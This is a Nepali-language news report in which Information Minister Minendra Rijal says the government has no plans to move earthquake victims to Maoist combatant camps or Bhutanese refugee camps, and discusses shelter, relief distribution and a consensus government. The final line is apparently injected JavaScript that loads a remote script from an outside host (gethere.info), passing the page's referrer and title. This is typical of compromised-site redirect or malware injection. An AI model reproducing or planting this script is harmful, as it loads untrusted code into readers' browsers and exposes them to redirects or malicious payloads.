सरकारका प्रवक्ता एवं सूचना तथा सञ्चारमन्त्री मिनेन्द्र रिजालले भूकम्प पिडितहरुलाई माओवादी लडाकु शिबिर र भूटानी शरणार्थी शिविरमा लैजानै सरकारको कुनै तयारी नभएको बताउनुभएको छ। रिपोटर्स क्लब नेपालले सोमबार काठमाडौमा गरेको साक्षात्कारमा मन्त्री रिजालले भूकम्प पिडितहरुहरुलाई अस्थायी र स्थायी आश्रम निर्माण गर्ने अन्तिम तयारीमा रहेपनि लडाकु शिबिर र भूटानी शरणार्थी शिविरमा लैजाने बिषयमा छलफल नै नभएको बताउनुभएको हो। बिनासकारी भूकम्पबाट ६ लाख बढि घर परिवार बिस्थापित भएका छन् । मन्त्री रिजालले स्थानियहरुलाई नजिकैको जिल्ला प्रशासन कार्यलय वा नजिकैको सरकारी कार्यालयमा राख्ने बिषयमा छलफल भएको उल्लेख गर्नुभयो। उहाले पिडितहरुलाई जस्तापाता बितरणको कार्य तत्काल सुरु गर्ने धारणा पनि राख्नुभयो।
मन्त्री रिजालले बिपतको अबस्थामा राष्ट्रिय सहमतिय सरकार निर्माणका लागी आफुहरु तयार रहेको बताउनुभयो। यसका लागी प्रधानमन्त्री कोईरालाले छलफललाई तिव्रता दिनुभएको उल्लेख गर्नुभयो। उहाले पिडितहरुलाई राहत बितरणको कार्यलाई व्यापकताका साथ अघि बढाउने धारणा राख्नुभयो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;